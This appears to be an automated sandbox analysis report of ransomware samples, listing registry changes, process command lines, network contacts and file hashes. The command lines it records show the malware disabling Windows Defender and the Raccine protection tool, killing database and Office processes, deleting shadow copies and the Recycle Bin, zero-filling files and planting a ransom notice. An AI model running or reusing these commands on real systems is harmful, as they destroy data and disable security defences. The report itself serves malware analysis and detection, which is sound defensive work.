| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\reg.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" | C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "YOUR COMPANY NETWORK HAS BEEN HACKED" | C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO" | C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1" | C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
"C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe"
C:\Windows\SYSTEM32\taskkill.exe
"taskkill" /F /IM RaccineSettings.exe
C:\Windows\SYSTEM32\reg.exe
"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
C:\Windows\SYSTEM32\reg.exe
"reg" delete HKCU\Software\Raccine /F
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /DELETE /TN "Raccine Rules Updater" /F
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config Dnscache start= auto
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config FDResPub start= auto
C:\Windows\SYSTEM32\netsh.exe
"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SSDPSRV start= auto
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SstpSvc start= disabled
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config upnphost start= auto
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLWriter start= disabled
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM synctime.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mysqld.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM Ntrtscan.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM sqbcoreservice.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM firefoxconfig.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM encsvc.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM isqlplussvc.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM excel.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM agntsvc.exe /F
C:\Windows\SYSTEM32\netsh.exe
"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM dbeng50.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM onenote.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM CNTAoSMgr.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM thebat.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM thebat64.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM PccNTMon.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM sqlwriter.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM steam.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM ocomm.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM msaccess.exe /F
C:\Windows\SYSTEM32\arp.exe
"arp" -a
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM tbirdconfig.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" IM thunderbird.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM dbsnmp.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM infopath.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM outlook.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM tmlisten.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM xfssvccon.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mbamtray.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM msftesql.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM wordpad.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM zoolz.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mysqld-opt.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM powerpnt.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM ocautoupds.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM ocssd.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM visio.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM oracle.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM sqlagent.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM winword.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM sqlbrowser.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mysqld-nt.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM sqlservr.exe /F
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
C:\Windows\SYSTEM32\netsh.exe
"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
C:\Windows\SYSTEM32\netsh.exe
"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
C:\Windows\SYSTEM32\arp.exe
"arp" -a
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
C:\Windows\system32\PING.EXE
ping 127.0.0.7 -n 3
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=524288 “%s”
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\PAExec-5568-RJMQBVDN.exe
C:\Windows\PAExec-5568-RJMQBVDN.exe -service
C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.exe
"C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\system32\taskkill.exe
"taskkill" /F /IM RaccineSettings.exe
C:\Windows\system32\reg.exe
"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.poweradmin.com | udp |
| US | 52.1.55.52:443 | www.poweradmin.com | tcp |
| US | 8.8.8.8:53 | live.sysinternals.com | udp |
| GB | 20.49.223.105:80 | live.sysinternals.com | tcp |
| N/A | 10.10.0.255:3 | udp | |
| N/A | 10.10.0.255:3 | udp | |
| N/A | 10.10.0.255:3 | udp | |
| N/A | 10.10.0.28:59184 | tcp | |
| N/A | 10.10.0.28:59187 | tcp | |
| N/A | 10.10.0.28:59188 | tcp | |
| N/A | 10.10.0.28:59190 | tcp | |
| N/A | 10.10.0.28:59192 | tcp | |
| N/A | 10.10.0.28:59194 | tcp | |
| N/A | 10.10.0.28:59196 | tcp | |
| N/A | 10.10.0.28:59198 | tcp | |
| N/A | 10.10.0.28:59199 | tcp | |
| N/A | 10.10.0.28:59202 | tcp | |
| N/A | 10.10.0.28:59203 | tcp | |
| N/A | 10.10.0.28:59206 | tcp | |
| N/A | 10.10.0.28:59207 | tcp | |
| N/A | 10.10.0.28:59210 | tcp | |
| N/A | 10.10.0.28:59211 | tcp | |
| N/A | 10.10.0.28:59214 | tcp | |
| N/A | 10.10.0.28:59216 | tcp | |
| N/A | 10.10.0.28:59218 | tcp | |
| N/A | 10.10.0.28:59221 | tcp | |
| N/A | 10.10.0.28:59224 | tcp | |
| N/A | 10.10.0.28:59225 | tcp | |
| N/A | 10.10.0.28:59241 | tcp | |
| N/A | 10.10.0.28:59244 | tcp | |
| N/A | 10.10.0.28:59246 | tcp | |
| N/A | 10.10.0.28:59248 | tcp | |
| N/A | 10.10.0.28:59250 | tcp | |
| N/A | 10.10.0.28:59252 | tcp | |
| N/A | 10.10.0.28:59254 | tcp | |
| N/A | 10.10.0.28:59257 | tcp | |
| N/A | 10.10.0.28:59259 | tcp | |
| N/A | 10.10.0.28:59261 | tcp | |
| N/A | 10.10.0.28:59263 | tcp | |
| N/A | 10.10.0.28:59265 | tcp | |
| N/A | 10.10.0.28:59267 | tcp | |
| N/A | 10.10.0.28:59269 | tcp | |
| N/A | 10.10.0.28:59270 | tcp | |
| N/A | 10.10.0.28:59272 | tcp | |
| N/A | 10.10.0.28:59274 | tcp | |
| N/A | 10.10.0.28:59276 | tcp | |
| N/A | 10.10.0.28:59278 | tcp | |
| N/A | 10.10.0.28:59280 | tcp | |
| N/A | 10.10.0.28:59281 | tcp | |
| N/A | 10.10.0.28:59283 | tcp | |
| N/A | 10.10.0.28:59284 | tcp | |
| N/A | 10.10.0.28:59285 | tcp | |
| N/A | 10.10.0.28:59288 | tcp | |
| N/A | 10.10.0.28:59289 | tcp | |
| N/A | 10.10.0.28:59290 | tcp | |
| N/A | 10.10.0.28:59291 | tcp | |
| N/A | 10.10.0.28:59293 | tcp | |
| N/A | 10.10.0.28:59294 | tcp | |
| N/A | 10.10.0.28:59296 | tcp | |
| N/A | 10.10.0.28:59297 | tcp | |
| N/A | 10.10.0.28:59300 | tcp | |
| N/A | 10.10.0.28:59301 | tcp | |
| N/A | 10.10.0.21:50757 | tcp | |
| N/A | 10.10.0.21:50765 | tcp | |
| N/A | 10.10.0.21:50766 | tcp | |
| N/A | 10.10.0.21:50768 | tcp | |
| N/A | 10.10.0.21:50769 | tcp | |
| N/A | 10.10.0.21:50770 | tcp | |
| N/A | 10.10.0.21:50772 | tcp | |
| N/A | 10.10.0.21:50773 | tcp | |
| N/A | 10.10.0.21:50775 | tcp | |
| N/A | 10.10.0.21:50779 | tcp | |
| N/A | 10.10.0.21:50781 | tcp | |
| N/A | 10.10.0.21:50784 | tcp | |
| N/A | 10.10.0.21:50785 | tcp | |
| N/A | 10.10.0.15:58619 | tcp | |
| N/A | 10.10.0.15:58625 | tcp | |
| N/A | 10.10.0.15:58626 | tcp | |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
Files
memory/3924-114-0x00000000003A0000-0x00000000003A1000-memory.dmp
memory/3924-116-0x000000001AFE0000-0x000000001AFE2000-memory.dmp
memory/3984-117-0x0000000000000000-mapping.dmp
memory/2704-118-0x0000000000000000-mapping.dmp
memory/752-119-0x0000000000000000-mapping.dmp
memory/4052-120-0x0000000000000000-mapping.dmp
memory/3680-121-0x0000000000000000-mapping.dmp
memory/1356-122-0x0000000000000000-mapping.dmp
memory/3844-124-0x0000000000000000-mapping.dmp
memory/1452-123-0x0000000000000000-mapping.dmp
memory/3884-125-0x0000000000000000-mapping.dmp
memory/3720-126-0x0000000000000000-mapping.dmp
memory/3288-127-0x0000000000000000-mapping.dmp
memory/3556-128-0x0000000000000000-mapping.dmp
memory/1344-129-0x0000000000000000-mapping.dmp
memory/2228-130-0x0000000000000000-mapping.dmp
memory/2868-131-0x0000000000000000-mapping.dmp
memory/760-132-0x0000000000000000-mapping.dmp
memory/3040-133-0x0000000000000000-mapping.dmp
memory/3648-134-0x0000000000000000-mapping.dmp
memory/3572-135-0x0000000000000000-mapping.dmp
memory/3336-136-0x0000000000000000-mapping.dmp
memory/2836-137-0x0000000000000000-mapping.dmp
memory/2820-138-0x0000000000000000-mapping.dmp
memory/3480-139-0x0000000000000000-mapping.dmp
memory/3888-140-0x0000000000000000-mapping.dmp
memory/4020-141-0x0000000000000000-mapping.dmp
memory/3344-142-0x0000000000000000-mapping.dmp
memory/1320-143-0x0000000000000000-mapping.dmp
memory/432-144-0x0000000000000000-mapping.dmp
memory/1328-145-0x0000000000000000-mapping.dmp
memory/1316-146-0x0000000000000000-mapping.dmp
memory/600-147-0x0000000000000000-mapping.dmp
memory/4104-148-0x0000000000000000-mapping.dmp
memory/4156-149-0x0000000000000000-mapping.dmp
memory/4204-150-0x0000000000000000-mapping.dmp
memory/4268-151-0x0000000000000000-mapping.dmp
memory/4320-152-0x0000000000000000-mapping.dmp
memory/4360-153-0x0000000000000000-mapping.dmp
memory/4392-154-0x0000000000000000-mapping.dmp
memory/4444-155-0x0000000000000000-mapping.dmp
memory/4516-156-0x0000000000000000-mapping.dmp
memory/4556-157-0x0000000000000000-mapping.dmp
memory/4588-158-0x0000000000000000-mapping.dmp
memory/4640-159-0x0000000000000000-mapping.dmp
memory/4692-160-0x0000000000000000-mapping.dmp
memory/4764-161-0x0000000000000000-mapping.dmp
memory/4776-162-0x0000000000000000-mapping.dmp
memory/4872-163-0x0000000000000000-mapping.dmp
memory/4884-164-0x0000000000000000-mapping.dmp
memory/4976-165-0x0000000000000000-mapping.dmp
memory/5028-166-0x0000000000000000-mapping.dmp
memory/5072-167-0x0000000000000000-mapping.dmp
memory/2088-168-0x0000000000000000-mapping.dmp
memory/1672-169-0x0000000000000000-mapping.dmp
memory/3756-170-0x0000000000000000-mapping.dmp
memory/3896-171-0x0000000000000000-mapping.dmp
memory/2464-172-0x0000000000000000-mapping.dmp
memory/4132-173-0x0000000000000000-mapping.dmp
memory/4192-174-0x0000000000000000-mapping.dmp
memory/4372-175-0x0000000000000000-mapping.dmp
memory/4252-176-0x0000000000000000-mapping.dmp
memory/4308-177-0x0000000000000000-mapping.dmp
memory/4540-178-0x0000000000000000-mapping.dmp
memory/4332-179-0x0000000000000000-mapping.dmp
memory/4332-185-0x00000289CCE50000-0x00000289CCE51000-memory.dmp
memory/4332-190-0x00000289CF020000-0x00000289CF021000-memory.dmp
memory/4332-201-0x00000289CCEC0000-0x00000289CCEC2000-memory.dmp
memory/4332-202-0x00000289CCEC6000-0x00000289CCEC8000-memory.dmp
memory/4332-203-0x00000289CCEC3000-0x00000289CCEC5000-memory.dmp
memory/4720-205-0x0000000000000000-mapping.dmp
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
| MD5 | 81f2e6838b3675761922aa2381151539 |
| SHA1 | 62960abd80931dc373a5917051dbea46f8bc687a |
| SHA256 | c259fed4c0ad3fedac2fe51bcd019be0ff954e4daf913a278d106c2ade216b6a |
| SHA512 | 80cdd76e82f9de07ae86c0f18eb655f0d4e43fbcf4cac79fc001a7a83ab9d2442e02be93c1adbf3b647b6e9288473790af3b17ff2cf4636fede9b4b22e108487 |
C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.exe
| MD5 | b31f6216e6bc5a6291a0b82de0377553 |
| SHA1 | 0afdc5359268f7e78a0ca3c3c67752edd304a742 |
| SHA256 | 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb |
| SHA512 | 7044cae1da196e1997fd21cbac41ff0d8e7dd5da6ebcf14e4ecd26ff53f65936430c009e473c17a2eecabbc5645e2d1fb32c5ef8ab036d045b5941a52e2982f6 |
memory/4312-210-0x0000000000170000-0x0000000000171000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.exe
| MD5 | b31f6216e6bc5a6291a0b82de0377553 |
| SHA1 | 0afdc5359268f7e78a0ca3c3c67752edd304a742 |
| SHA256 | 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb |
| SHA512 | 7044cae1da196e1997fd21cbac41ff0d8e7dd5da6ebcf14e4ecd26ff53f65936430c009e473c17a2eecabbc5645e2d1fb32c5ef8ab036d045b5941a52e2982f6 |
memory/4312-212-0x0000000000A40000-0x0000000000A42000-memory.dmp
memory/4616-229-0x00000207D9D50000-0x00000207D9D52000-memory.dmp
memory/4616-230-0x00000207D9D53000-0x00000207D9D55000-memory.dmp
memory/4620-231-0x0000020C7A0A0000-0x0000020C7A0A2000-memory.dmp
memory/4620-232-0x0000020C7A0A3000-0x0000020C7A0A5000-memory.dmp
memory/4620-241-0x0000020C7A3F0000-0x0000020C7A3F1000-memory.dmp
memory/4616-253-0x00000207DB990000-0x00000207DB991000-memory.dmp
memory/4620-254-0x00007FF69F280000-0x00007FF69F281000-memory.dmp
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f4912cd27f85cc109ddabd6e6c35d0a5 |
| SHA1 | fd75c0930c4d4b9483ba83b11cae4f4d2d59ea2c |
| SHA256 | 72255abde6af7af37088f46103add19fa78fd548031e1659029e41b4314652ee |
| SHA512 | 1c2b32dc0fe135064a9f9be611f1f036dccd3d80bf1ad66f1f69cd371acecd0ddd42f191b2098da9b0f3571a646825fa0a7ceda44a945bfe83ab4e7803fa1b01 |
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 478f1c1fcff584f4f440469ed71d2d43 |
| SHA1 | 0900e9dc39580d527c145715f985a5a86e80b66c |
| SHA256 | c918bf6bad93b653f9d05007634b088be7b91ed4350b777905d0520d93d650eb |
| SHA512 | 4ed62f2add77e0dd8e07e101ee06bdb8a15808b701c7580b09704bd4befdecf7cfe2fa29d6e96f2149a92f4e1b0cae0d9810a5cde3f4940145f8120f7322d1a7 |
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f4912cd27f85cc109ddabd6e6c35d0a5 |
| SHA1 | fd75c0930c4d4b9483ba83b11cae4f4d2d59ea2c |
| SHA256 | 72255abde6af7af37088f46103add19fa78fd548031e1659029e41b4314652ee |
| SHA512 | 1c2b32dc0fe135064a9f9be611f1f036dccd3d80bf1ad66f1f69cd371acecd0ddd42f191b2098da9b0f3571a646825fa0a7ceda44a945bfe83ab4e7803fa1b01 |
memory/4616-259-0x00000207D9D55000-0x00000207D9D56000-memory.dmp
memory/2996-260-0x0000016075EA0000-0x0000016075EA2000-memory.dmp
memory/4616-261-0x00000207D9D57000-0x00000207D9D59000-memory.dmp
memory/4620-262-0x0000020C7A0A5000-0x0000020C7A0A6000-memory.dmp
memory/4620-263-0x0000020C7A0A7000-0x0000020C7A0A9000-memory.dmp
memory/788-265-0x0000021962E90000-0x0000021962E92000-memory.dmp
memory/4888-264-0x000001B15B4A0000-0x000001B15B4A2000-memory.dmp
memory/788-266-0x0000021962E93000-0x0000021962E95000-memory.dmp
memory/4888-267-0x000001B15B4A3000-0x000001B15B4A5000-memory.dmp
memory/3940-269-0x0000014A36E33000-0x0000014A36E35000-memory.dmp
memory/3940-268-0x0000014A36E30000-0x0000014A36E32000-memory.dmp
memory/4020-270-0x0000020C7AB40000-0x0000020C7AB42000-memory.dmp
memory/596-271-0x000001E8E65D0000-0x000001E8E65D2000-memory.dmp
memory/4020-273-0x0000020C7AB43000-0x0000020C7AB45000-memory.dmp
memory/2268-274-0x0000018274140000-0x0000018274142000-memory.dmp
memory/596-272-0x000001E8E65D3000-0x000001E8E65D5000-memory.dmp
memory/2268-275-0x0000018274143000-0x0000018274145000-memory.dmp
memory/4556-276-0x000001E95F370000-0x000001E95F372000-memory.dmp
memory/4780-277-0x000001AC28FF0000-0x000001AC28FF2000-memory.dmp
memory/4780-278-0x000001AC28FF3000-0x000001AC28FF5000-memory.dmp
memory/2996-280-0x0000016075EA3000-0x0000016075EA5000-memory.dmp
memory/4556-279-0x000001E95F373000-0x000001E95F375000-memory.dmp
memory/1440-281-0x0000022AEC8B0000-0x0000022AEC8B2000-memory.dmp
memory/1440-282-0x0000022AEC8B3000-0x0000022AEC8B5000-memory.dmp
memory/4272-284-0x000001F1BBCF3000-0x000001F1BBCF5000-memory.dmp
memory/4272-283-0x000001F1BBCF0000-0x000001F1BBCF2000-memory.dmp
memory/984-285-0x000001DA44E90000-0x000001DA44E92000-memory.dmp
memory/984-286-0x000001DA44E93000-0x000001DA44E95000-memory.dmp
memory/4020-289-0x0000020C7AB45000-0x0000020C7AB46000-memory.dmp
memory/4020-290-0x0000020C7AB47000-0x0000020C7AB49000-memory.dmp
memory/4888-291-0x000001B15B4A5000-0x000001B15B4A6000-memory.dmp